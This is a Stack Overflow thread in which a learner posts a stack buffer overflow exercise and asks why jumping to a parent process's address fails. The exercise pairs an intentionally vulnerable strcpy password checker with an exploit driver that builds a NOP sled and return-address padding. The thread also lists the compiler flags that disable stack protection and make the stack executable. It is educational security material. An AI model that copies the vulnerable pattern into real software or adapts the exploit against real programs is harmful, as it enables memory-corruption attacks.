How to access address space of parent process from child process?

Question

I am executing a program B from the main function of another program A by C library function system(). But when I am passing an address of the A to the B as an argument to replace the return address in the process B by buffer overflow, it is showing segmentation fault.

I know each process cannot access address space of another process. But is there any way I can buffer overflow the child process so that execution returns to the parent process? I am using x64 bit machine and gcc with -m32, -fno-stack-protector options.

This is the program A from where I am executing another program B:

int main(int argc, char *argv[]) {
   unsigned int i, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./child \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // add NOP instructions

   strcat(command, "\'");

   system(command); // run another program
   free(command);
}

And this is the other program B which is vulnerable to buffer overflow

int testAuthenetication(char *password){
    int value = 0;
    char buffer[8];

    strcpy(buffer, password);

    if(strcmp(buffer, "abcd") == 0){
        value = 1;
    }
    if(strcmp(buffer, "abcdef") == 0){
        value = 1;
    }

    return value;
}

int main(int argc, char *argv[]){
    if(argc < 2){
        printf("Enter the password \n");
        return 0;
    }

    if(testAuthenetication(argv[1])){
        printf("Access Granted \n");    
    }
    else{   
        printf("Access denied \n");
    }
    return 0;
}

Maybe you want to rather use shared memory (or any other IPC method) instead of manipulating the address space of another process? — Sebastian, Jun 19 '16 at 08:49
On any modern OS addresses are relative to processes, so an address taken from process A doesn't mean anything to a process B. — alk, Jun 19 '16 at 08:51
@Sebastian Dressler Yes shared memory can be a option as long as the instruction execution returns to the parent process by buffer overflow. Can you please explain how to share memory between two? — Kaustav, Jun 19 '16 at 08:51
@Kaustav I think explaining your rationale would help. "returns to the parent process by buffer overflow" sounds like something you bad is going to happen. — Sebastian, Jun 19 '16 at 08:53
@Sebastian Dressler I am not able to share memory between two processes. Can you please answer the question with example code? I learning it because it is cool and and to know the internals of buffer overflow for purely learning purpose :) — Kaustav, Jun 19 '16 at 08:57
Read on SHM, though. Also overflowing buffers invokes Undefined Behaviour, which helps rarely. — alk, Jun 19 '16 at 09:11
You don't want any kind of buffer overflow. A buffer overflow means your program is dead. — n. m. could be an AI, Jun 19 '16 at 09:43
If you know you can't access the address space of another process why are you passing a pointer to the address space of another process? — user207421, Jun 19 '16 at 10:53
@EJP It's just an experiment code where I am trying to explain my question. — Kaustav, Jun 19 '16 at 10:59
the posted code for program `A` does not compile!! To fix that, my first suggestion is to add the missing `#include` statements (I and most others are not interested in trying to read your mind as to what `#include` statements your actual code has. — user3629249, Jun 19 '16 at 19:25

score 1 · Answer 1 · edited May 23 '17 at 11:53

1

"so that execution returns to the parent process": I don't see how this is possible. The instructions of the parent process are in another memory space (different page tables selected by the kernel through CR3), so if you try to jump to the address of the parent from the child, there will be trash / invalid pages there.

I recommend that you state the context / end goal more clearly: are you trying to do arbitrary code execution from an overflow is that it? And B is the vulnerable program, and A the exploit code?

If that is the case, try to write the arbitrary code to an executable portion of the memory of the child process, and then use the overflow to jump to it, all in the child process itself. I am not sure if this will work.

The Y of this X has been asked less precisely at: How are buffer overflows used to exploit computers? (but not of the answers currently give a minimal example).

edited May 23 '17 at 11:53

Community

1
1

answered Jun 19 '16 at 09:23

Ciro Santilli OurBigBook.com

347,512
102
1,199
985

Yes I am trying to execute arbitrary code from an overflow. Also you are correct about B is the vulnerable program and A is the exploit code. If I don't have access to the code B, then how to execute the arbitrary code? – Kaustav Jun 19 '16 at 10:05
@Kaustav as I mention in my answer, write the executable code to B's address space (with the command line arguments), and make B jump there. I'm not sure if it will work, because of things like the memory you write to might not have executable permission. – Ciro Santilli OurBigBook.com Jun 19 '16 at 10:33
Can you please explain how to pass the arbitrary code with the command line with an code example? – Kaustav Jun 19 '16 at 11:00
@Kaustav as soon as you pass CLI arguments, they are put on the top of the process space above the stack. And then they are also copied on the `strcpy` that does the overflow. – Ciro Santilli OurBigBook.com Jun 19 '16 at 11:05
Santilli I think I can't execute the code from stack and also the CLI arguments are stored on the stack. Isn't it correct? – Kaustav Jun 19 '16 at 11:25
@Kaustav I'm not sure what is executable or not, maybe you are right :-) – Ciro Santilli OurBigBook.com Jun 19 '16 at 11:26
then is there any other way to execute the arbitrary code? – Kaustav Jun 19 '16 at 11:28
@Kaustav I don't know, haven't tried that before. Has been asked at: http://stackoverflow.com/questions/460519/how-are-buffer-overflows-used-to-exploit-computers and if possible Google will explain how. – Ciro Santilli OurBigBook.com Jun 19 '16 at 11:29
Thanks for your help. I found that the option -z execstack with gcc make the stack memory executable. So it answered my question – Kaustav Jun 19 '16 at 20:22

How to access address space of parent process from child process?

1 Answers1